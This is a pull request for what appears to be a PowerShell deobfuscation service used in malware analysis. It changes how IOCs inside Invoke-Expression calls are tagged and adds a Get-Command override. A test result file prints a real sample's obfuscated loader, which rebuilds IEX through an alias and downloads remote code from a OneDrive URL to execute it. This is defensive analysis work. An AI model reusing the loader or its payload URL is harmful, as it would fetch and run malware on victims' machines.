### PR TITLE
Set iocs found in IEX calls to static and fix GCM calls

### DIFF
--- a/overpower/overpower.py
+++ b/overpower/overpower.py
@@ -466,9 +466,11 @@ class Overpower(ServiceBase):
         urls_seen_in_actions: Set[str] = set()
         paths_seen_in_actions: Set[str] = set()
         for action in actions:
-            extract_iocs_from_text_blob(action, actions_ioc_table)
+            static_iocs = False
             if action.startswith(INVOKE_EXPRESSION_ACTION):
+                static_iocs = True  # iEX calls have the same false positives as static powershell scripts
                 iex_count += 1
+            extract_iocs_from_text_blob(action, actions_ioc_table, is_network_static=static_iocs)
             match = re.search(DOWNLOAD_FILE_REGEX, action, re.IGNORECASE)
             if match and len(match.regs) == 3:
                 url = match.group(1)

--- a/tests/results/1954ce6974e8203214c9eb20c2d73bd765e8d5599b9a02b3656845a50f61a634/result.json
+++ b/tests/results/1954ce6974e8203214c9eb20c2d73bd765e8d5599b9a02b3656845a50f61a634/result.json
@@ -5,7 +5,7 @@
     "sections": [
       {
         "auto_collapse": false,
-        "body": "[Invoke-Expression] Execute/Open: $Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$mv='(&'+'(G'+'C'+'$$$'.replace('$$$','M')+' *W-'+'O*)'+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authke...\n[Test-Connection] -comp google.com -count 1 -Quiet\n\n[Invoke-Expression] Execute/Open: (&(GCM *W-O*)Net.WebClient).DownloadString('https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q')\n",
+        "body": "[Invoke-Expression] Execute/Open: $Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$mv='(&'+'(G'+'C'+'$$$'.replace('$$$','M')+' *W-'+'O*)'+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authke...\n[Test-Connection] -comp google.com -count 1 -Quiet\n\n[Invoke-Expression] Execute/Open: (&(GCM *W-O*)Net.WebClient).DownloadString('https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q')\n\n[System.Net.WebClient.DownloadString] Download From: https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q\n",
         "body_config": {},
         "body_format": "TEXT",
         "classification": "TLP:C",
@@ -64,6 +64,18 @@
         "tags": {
           "network": {
             "dynamic": {
+              "domain": [
+                "google.com",
+                "onedrive.live.com"
+              ],
+              "uri": [
+                "https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q"
+              ],
+              "uri_path": [
+                "/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q"
+              ]
+            },
+            "static": {
               "domain": [
                 "google.com",
                 "onedrive.live.com"
@@ -404,6 +416,16 @@
         {
           "heur_id": 1,
           "signatures": [],
+          "value": "google.com"
+        },
+        {
+          "heur_id": 1,
+          "signatures": [],
+          "value": "onedrive.live.com"
+        },
+        {
+          "heur_id": 1,
+          "signatures": [],
           "value": "onedrive.live.com"
         }
       ],
@@ -412,9 +434,19 @@
           "heur_id": 1,
           "signatures": [],
           "value": "https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q"
+        },
+        {
+          "heur_id": 1,
+          "signatures": [],
+          "value": "https://onedrive.live.com/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q"
         }
       ],
       "network.static.uri_path": [
+        {
+          "heur_id": 1,
+          "signatures": [],
+          "value": "/download?cid=8B8C81E9EA559FF0&resid=8B8C81E9EA559FF0%211131&authkey=AMPC-h991zcyT5Q"
+        },
         {
           "heur_id": 1,
           "signatures": [],

--- a/tools/PSDecode.psm1
+++ b/tools/PSDecode.psm1
@@ -668,6 +668,18 @@ $Get_WmiObject_Override = @'
     }
 '@
 
+# https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command?view=powershell-5.1
+# We don't want cmdlets showing up next to overrides
+$Get_Command_Override = @'
+    function Get-Command {
+        $list = Microsoft.Powershell.Core\Get-Command $Args
+        $overrides = ForEach($command in $list) { 
+            Microsoft.Powershell.Core\Get-Command $command.Name
+        }
+        return $overrides | Select -unique
+    }
+'@
+
 function Get_Encoding_Type {
     param(
         [Parameter(Mandatory=$True)]
@@ -1733,6 +1745,7 @@ function PSDecode {
 
     if(!$x){
         $override_functions += $New_Object_Override
+        $override_functions += $Get_Command_Override
     }
 
     if($fakefile){


### PR DESCRIPTION
IEX calls just contain powershell, and so have the same false positive problems that the raw powershell script itself has. IOCs found in IEX are now static.

Sample 1954ce6974e8203214c9eb20c2d73bd765e8d5599b9a02b3656845a50f61a634 had an issue where a download command was missed within an iex call, and after changing IEX to static the ioc in that download was no longer tagged as dynamic. Overriding Get-Command so that both an override and it's original Cmdlet are not listed together in it's output fixed that issue, and now the download is captured in the actions correctly.